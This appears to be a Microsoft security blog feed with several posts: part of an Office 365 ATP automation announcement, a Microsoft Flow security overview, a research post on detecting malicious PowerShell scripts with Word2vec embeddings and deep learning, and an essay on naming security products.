Based on feedback from our public preview of these automation capabilities, we extended the Office 365 ATP events and alerts available in the Office 365 Management API to include links to these automated investigations and related artifacts. This helps security teams integrate these automation capabilities into existing security workflow solutions, such as SIEMs.

These capabilities are available as part of the following offerings. We hope you’ll give it a try.

Bringing SecOps efficiency by connecting the dots between disparate threat signals is a key promise of Microsoft Threat Protection. The integration across Microsoft Threat Protection helps bring broad and valuable insights that are critical to the incident response process. Get started with a Microsoft Threat Protection trial if you want to experience the comprehensive and integrated protection that Microsoft Threat Protection provides.

Automation services are steadily becoming significant drivers of modern IT, helping improve efficiency and cost effectiveness for organizations. A recent McKinsey survey discovered that “the majority of all respondents (57 percent) say their organizations are at least piloting the automation of processes in one or more business units or functions. Another 38 percent say their organizations have not begun to automate business processes, but nearly half of them say their organizations plan to do so within the next year.”

Automation is no longer a theme of the future, but a necessity of the present, playing a key role in a growing number of IT and user scenarios. As security professionals, you’ll need to recommend an automation service that enables your organization to reap its benefits without sacrificing on strict security and compliance standards.

In our two-part series, we share how Microsoft delivers on the promise of empowering a secure, compliant, and automated organization. In part 1, we provide a quick intro into Microsoft Flow and provide an overview into its best-in-class, secure infrastructure. In part 2, we go deeper into how Flow secures your users and data, as well as enhances the IT experience. We also cover Flow’s privacy and certifications to give you a glimpse into the rigorous compliance protocols the service supports. Let’s get started by introducing you to Flow.

To support the need for secure and compliant automation, Microsoft launched Flow. With Flow, organizations will experience:

  • Seamlessly integrated automation at scale.
  • Accelerated productivity.
  • Secure and compliant automation.

Secure and compliant automation is perhaps the most interesting value of Flow for this audience, but let’s discuss the first two benefits before diving into the third.

Integrated automation at scale

Flow is a Software as a Service (SaaS) automation service used by customers ranging from large enterprises, such as Virgin Atlantic, to smaller organizations, such as G&J Pepsi. Importantly, Flow serves as a foundational pillar for the Microsoft Power Platform, a seamlessly integrated, low-code development platform enabling easier and quicker application development. With Power Platform, organizations analyze data with Power BI, act on data through Microsoft PowerApps, and automate processes using Flow (Figure 1).

Diagram showing app automation driving business processes with Flow. The diagram shows Flow, PowerApps, and Power BI circling CDS, AI Builder, and Data Connectors.

Figure 1. Power Platform offers a seamless loop to deliver your business goals.

Low-code platforms can help scale IT capabilities to create a broader range of application developers—from the citizen to pro developer (Figure 2). With growing burdens on IT, scaling IT through citizen developers who design their own business applications, is a tremendous advantage. Flow is also differentiated from all other automated services because of its native integration with Microsoft 365, Dynamics 365, and Azure.

Image showing Citizen Developers, IT/Admins, and Pro Developers.

Figure 2. Low-code development platforms empower everyone to become a developer, from the citizen developer to the pro developer.

Accelerated productivity

Flow accelerates your organization’s productivity. The productivity benefits from Flow were recently quantified in a Total Economic Impact (TEI) study conducted by Forrester Research and commissioned by Microsoft (The Total Economic Impact™ Of PowerApps And Microsoft Flow, June 2018). Forrester determined that over a three-year period Flow helped organizations reduce application development and application management costs while saving thousands of employee hours (Figure 3).

Image showing 70% for Application development costs, 38% for Application management costs, and +122K for Worker Hours Saved.

Figure 3. Forrester TEI study results on the reduced application development and management costs and total worker hours saved.

Built with security and compliance

Automation will be the backbone for efficiency across much of your IT environment, so choosing the right service can have enormous impact on delivering the best business outcomes. As a security professional, you must ultimately select the service which best balances the benefits from automation with the rigorous security and compliance requirements of your organization. Let’s now dive into how Flow is built on a foundation of security and compliance, so that selecting Flow as your automation service is an easy decision.

A secure infrastructure

Comprehensive security accounts for a wide variety of attack vectors, and since Flow is a SaaS offering, infrastructure security is an important component and where we’ll start. Flow is a global service deployed in datacenters across the world (Figure 4). Security begins with the physical datacenter, which includes perimeter fencing, video cameras, security personnel, secure entrances, and real-time communications networks—continuing from every area of the facility to each server unit. To learn more about how our datacenters are secured, take a virtual tour.

The physical security is complemented with threat management of our cloud ecosystem. Microsoft security teams leverage sophisticated data analytics and machine learning and continuously pen-test against distributed-denial-of-service (DDoS) attacks and other intrusions.

Flow also has the luxury of being the only automation service natively built on Azure which has an architecture designed to secure and protect data. Each datacenter deployment of Flow consists of two clusters:

  • Web Front End (WFE) cluster—A user connects to the WFE before accessing any information in Flow. Servers in the WFE cluster authenticate users with Azure Active Directory (Azure AD), which stores user identities and authorizes access to data. Azure Traffic Manager finds the nearest Flow deployment, and that WFE cluster manages sign-in and authentication.
  • Backend cluster—All subsequent activity and access to data is handled through the back-end cluster. It manages dashboards, visualizations, datasets, reports, data storage, data connections, and data refresh activities. The backend cluster hosts many roles, including Azure API Management, Gateway, Presentation, Data, Background Job Processing, and Data Movement.

Users directly interact only with the Gateway role and Azure API Management, which are accessible through the internet. These roles perform authentication, authorization, distributed denial-of-service (DDoS) protection, bandwidth throttling, load balancing, routing, and other security, performance, and availability functions. There is a distinction between roles users can access and roles only accessible by the system.

Stay tuned for part 2 of our series where we’ll go deeper into how Flow further secures authentication of your users and data, and enhances the IT experience, all while aligning to several regulatory frameworks.

Image showing Microsoft’s global datacenter locations.

Figure 4. Microsoft’s global datacenter locations.

Let Flow enhance your digital transformation

Let your organization start benefiting from one of the most powerful and secure automation services available on the market. Watch the video and follow the instructions to get started with Flow. Be sure to join the growing Flow community and participate in discussions, provide insights, and even influence product roadmap. Also, follow the Flow blog to get news on the latest Flow updates and read our white paper on best practices for deploying Flow in your organization. Be sure to check out part 2 where we dive deeper into how Flow offers the best and broadest security and compliance foundation for any automation service available in the market.

Additional resources

Scientific and technological advancements in deep learning, a category of algorithms within the larger framework of machine learning, provide new opportunities for development of state-of-the art protection technologies. Deep learning methods are impressively outperforming traditional methods on such tasks as image and text classification. With these developments, there’s great potential for building novel threat detection methods using deep learning.

Machine learning algorithms work with numbers, so objects like images, documents, or emails are converted into numerical form through a step called feature engineering, which, in traditional machine learning methods, requires a significant amount of human effort. With deep learning, algorithms can operate on relatively raw data and extract features without human intervention.

At Microsoft, we make significant investments in pioneering machine learning that inform our security solutions with actionable knowledge through data, helping deliver intelligent, accurate, and real-time protection against a wide range of threats. In this blog, we present an example of a deep learning technique that was initially developed for natural language processing (NLP) and now adopted and applied to expand our coverage of detecting malicious PowerShell scripts, which continue to be a critical attack vector. These deep learning-based detections add to the industry-leading endpoint detection and response capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP).

Word embedding in natural language processing

Keeping in mind that our goal is to classify PowerShell scripts, we briefly look at how text classification is approached in the domain of natural language processing. An important step is to convert words to vectors (tuples of numbers) that can be consumed by machine learning algorithms. A basic approach, known as one-hot encoding, first assigns a unique integer to each word in the vocabulary, then represents each word as a vector of 0s, with 1 at the integer index corresponding to that word. Although useful in many cases, the one-hot encoding has significant flaws. A major issue is that all words are equidistant from each other, and semantic relations between words are not reflected in geometric relations between the corresponding vectors.

Contextual embedding is a more recent approach that overcomes these limitations by learning compact representations of words from data under the assumption that words that frequently appear in similar context tend to bear similar meaning. The embedding is trained on large textual datasets like Wikipedia. The Word2vec algorithm, an implementation of this technique, is famous not only for translating semantic similarity of words to geometric similarity of vectors, but also for preserving polarity relations between words. For example, in Word2vec representation:

Madrid – Spain + Italy ≈ Rome

Embedding of PowerShell scripts

Since training a good embedding requires a significant amount of data, we used a large and diverse corpus of 386K distinct unlabeled PowerShell scripts. The Word2vec algorithm, which is typically used with human languages, provides similarly meaningful results when applied to PowerShell language. To accomplish this, we split the PowerShell scripts into tokens, which then allowed us to use the Word2vec algorithm to assign a vectorial representation to each token .

Figure 1 shows a 2-dimensional visualization of the vector representations of 5,000 randomly selected tokens, with some tokens of interest highlighted. Note how semantically similar tokens are placed near each other. For example, the vectors representing -eq, -ne and -gt, which in PowerShell are aliases for “equal”, “not-equal” and “greater-than”, respectively, are clustered together. Similarly, the vectors representing the allSigned, remoteSigned, bypass, and unrestricted tokens, all of which are valid values for the execution policy setting in PowerShell, are clustered together.

Figure 1. 2D visualization of 5,000 tokens using Word2vec

Examining the vector representations of the tokens, we found a few additional interesting relationships.

Token similarity: Using the Word2vec representation of tokens, we can identify commands in PowerShell that have an alias. In many cases, the token closest to a given command is its alias. For example, the representations of the token Invoke-Expression and its alias IEX are closest to each other. Two additional examples of this phenomenon are the Invoke-WebRequest and its alias IWR, and the Get-ChildItem command and its alias GCI.

We also measured distances within sets of several tokens. Consider, for example, the four tokens $i, $j, $k and $true (see the right side of Figure 2). The first three are usually used to represent a numeric variable and the last naturally represents a Boolean constant. As expected, the $true token mismatched the others – it was the farthest (using the Euclidean distance) from the center of mass of the group.

More specific to the semantics of PowerShell in cybersecurity, we checked the representations of the tokens: bypass, normal, minimized, maximized, and hidden (see the left side of Figure 2). While the first token is a legal value for the ExecutionPolicy flag in PowerShell, the rest are legal values for the WindowStyle flag. As expected, the vector representation of bypass was the farthest from the center of mass of the vectors representing all other four tokens.

Figure 2. 3D visualization of selected tokens

Linear Relationships: Since Word2vec preserves linear relationships, computing linear combinations of the vectorial representations results in semantically meaningful results. Below are a few interesting relationships we found:

high – $false + $true ≈’ low
‘-eq’ – $false + $true ‘≈ ‘-neq’
DownloadFile – $destfile + $str ≈’ DownloadString ‘
Export-CSV’ – $csv + $html ‘≈ ‘ConvertTo-html’
‘Get-Process’-$processes+$services ‘≈ ‘Get-Service’

In each of the above expressions, the sign ≈ signifies that the vector on the right side is the closest (among all the vectors representing tokens in the vocabulary) to the vector that is the result of the computation on the left side.

Detection of malicious PowerShell scripts with deep learning

We used the Word2vec embedding of the PowerShell language presented in the previous section to train deep learning models capable of detecting malicious PowerShell scripts. The classification model is trained and validated using a large dataset of PowerShell scripts that are labeled “clean” or “malicious,” while the embeddings are trained on unlabeled data. The flow is presented in Figure 3.

Figure 3 High-level overview of our model generation process

Using GPU computing in Microsoft Azure, we experimented with a variety of deep learning and traditional ML models. The best performing deep learning model increases the coverage (for a fixed low FP rate of 0.1%) by 22 percentage points compared to traditional ML models. This model, presented in Figure 4, combines several deep learning building blocks such as Convolutional Neural Networks (CNNs) and Long Short-Term Memory Recurrent Neural Networks (LSTM-RNN). Neural networks are ML algorithms inspired by biological neural systems like the human brain. In addition to the pretrained embedding described here, the model is provided with character-level embedding of the script.

Figure 4 Network architecture of the best performing model

Real-world application of deep learning to detecting malicious PowerShell

The best performing deep learning model is applied at scale using Microsoft ML.Net technology and ONNX format for deep neural networks to the PowerShell scripts observed by Microsoft Defender ATP through the AMSI interface. This model augments the suite of ML models and heuristics used by Microsoft Defender ATP to protect against malicious usage of scripting languages.

Since its first deployment, this deep learning model detected with high precision many cases of malicious and red team PowerShell activities, some undiscovered by other methods. The signal obtained through PowerShell is combined with a wide range of ML models and signals of Microsoft Defender ATP to detect cyberattacks.

The following are examples of malicious PowerShell scripts that deep learning can confidently detect but can be challenging for other detection methods:

Figure 5. Heavily obfuscated malicious script

Figure 6. Obfuscated script that downloads and runs payload

Figure 7. Script that decrypts and executes malicious code

Enhancing Microsoft Defender ATP with deep learning

Deep learning methods significantly improve detection of threats. In this blog, we discussed a concrete application of deep learning to a particularly evasive class of threats: malicious PowerShell scripts. We have and will continue to develop deep learning-based protections across multiple capabilities in Microsoft Defender ATP.

Development and productization of deep learning systems for cyber defense require large volumes of data, computations, resources, and engineering effort. Microsoft Defender ATP combines data collected from millions of endpoints with Microsoft computational resources and algorithms to provide industry-leading protection against attacks.

Stronger detection of malicious PowerShell scripts and other threats on endpoints using deep learning mean richer and better-informed security through Microsoft Threat Protection, which provides comprehensive security for identities, endpoints, email and data, apps, and infrastructure.

 

Shay Kels and Amir Rubin
Microsoft Defender ATP team

 

Additional references:

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

When I was a kid, Gilligan’s Island reruns aired endlessly on TV. The character of the Professor was supposed to sound smart, so he’d use complex words to describe simple concepts. Instead of saying, “I’m nearsighted” he’d say, “My eyes are ametropic and completely refractable.” Sure, it was funny, but it didn’t help people understand his meaning.

Security vendors and professionals suffer from a pinch of “Professor-ism” and often use complex words and terminology to describe simple concepts. Here are few guidelines to consider when naming or describing your products, services, and features:

Assess whether a new term or acronym is needed

Before trying to create a new term or acronym, assess whether an existing one will work. Consider the mobile device space where tools used to manage mobile devices were originally known as MDM for mobile device management. Pretty straightforward. But then the acronym flood started with MAM (mobile application management), MIM (mobile information management), and EMM (enterprise mobile management). It’s true, there are some technical differences between the four, but a quick Bing search shows a raft of articles explaining the differences because it’s not clear to the average customer. And, frankly, all of them are basically subsets of the MDM acronym.

Use acronyms with enthusiasm and clarity

When creating a new term or acronym there is no point in being memorable if the meaning gets lost in the noise. Instead of succumbing to the path of least resistance by forming an acronym, put a little oomph into your naming efforts.

A recent example is SOAR (Security Orchestration, Automation, and Response). Yes, it was a whole new category and one that is adjacent to SIEM (security information and event monitoring) but it adds clarity because it describes a new set of features and functions—like incident response activities and playbooks—which aren’t covered by traditional SIEMs.

Acronyms can save time, but when you get into splintered variants like the MDM example, clarity goes out the window. Since not all acronyms are created equal, go for acronym gold—and make sure there is a recognizable connection to your brand or (even better) the product itself.

This strategy can yield explosive results! Think TNT (Trinitrotoluene), or the more chill TCBY® (The Country’s Best Yogurt), or the zip in ZIP code (Zone Improvement Plan). Compare these zingers with an acronym for something like UDM (Unified Data Management). Sorry—is that the sound of you snoring? (Me, too!)

Put a little pep in your step (and your sales) by producing names that are sharply focused—like laser (Light Amplification by Stimulated Emission of Radiation)—which is an acronym that has become synonymous with what it does and has some well-placed vowels. Another winner in this category is GIF (graphics interchange format). While this acronym wasn’t recognizable out the door, it became synonymous with the product it created by adding a bit of pizzazz to the mix.

Use names that are clear and practical—but catch and hold the imagination

Resist the temptation to take a cool buzzword and tack it onto your marketing efforts to take advantage of the attention. I once saw a basic power strip advertised as “internet ready.” Come on now! Find words or phrases that catch and hold the imagination—while saying something about your product’s functionality.

Sometimes it’s as simple as helping customers understand what the product does: antimalware? Customers are going to get that this probably protects against malware. If the solution really is a new approach, make the name as clear as possible.

In addition, rather than inventing new terms, consider being very practical. Think of the use-cases and ask these questions: What does the solution do for the customer or business? What does the solution deliver? Or what kind of brand experience does your product provide?

Years ago, I ran afoul of a company that advertised itself as “S-OX in a Box” (that’s Sarbanes-Oxley, not a sports or footwear reference), because I wrote a piece on the complexity of the tech side of S-OX compliance. I explained why it wasn’t as simple as buying a “S-OX in a BOX” solution. I wasn’t trying to call out that specific company, but rather to show why it can be better to be clear and explicit about what a solution does. S-OX is too complex for a single solution to do it all. But a tool that can help automate S-OX compliance reporting? That, for many companies, is a big win.

Also, think about the non-cyber world—where companies describe the function to discover an evocative name. Examples of everyday products that accomplish this include bubble wrap, Chapstick®, Crock-Pot®, and Onesie®. Not all first tries will be winners. For example, the breathalyzer was originally known as the Drunk-O-Meter. Just experiment with it. Have some fun. Make it meaningful to your client or customer.

Never overpromise

Promising customers that they will never have a breach again is a pretty lofty claim. And most likely impossible. Words like absolute, perfect, and unhackable may sound good in copy, but can you guarantee a product or solution really deliver absolute security?

Savvy customers know that security is about risk management and tradeoffs and that no solution is completely immune to all attacks. Rather than overpromise, consider helping the customer understand what the solution does. Does the product protect against a breach by monitoring the database? Good, then say that.

Get creative and mix it up

Get creative by mixing initials and non-initial letters, as in “radar” (RAdio Detection And Ranging). Or try “initialism,” which requires you pronounce your abbreviation as a string of separate letters. Examples include OEM (original equipment manufacturing) and the BBC (British Broadcasting Corporation). You can also incorporate a shortcut into the name by combining numbers and letters like 3M (Minnesota Mining and Manufacturing Company).

If you’re really stuck, try a backronym

A backronym is created when you turn a word into an acronym by assigning each letter a word of its own—after a term is already in use. For example, the term “rap” (as in rap music) is a backronym for rhythm and poetry and SOAR is a backronym for Security Orchestration, Automation, and Response.

If you want something closer to the technology realm, check out what NASA (a well-known acronym for National Aeronautics and Space Administration) did. They named a space station treadmill in honor of comedian Stephen Colbert by coming up with the words to spell out his name: Combined Operational Load-Bearing External Resistance Treadmill (COLBERT).

Find your sweet spot

When it comes to using common words to describe uncommon things, combine the freshness and friendliness of Mary Ann and with the profit mindset of Thurston Howell III to come up with names that intrigue people with their relatability and nail the sale because clients and customers get a clear idea of the product’s business value.

Reach out to me on LinkedIn or Twitter and let me know what you’d like to see us cover as we talk about new security products and capabilities.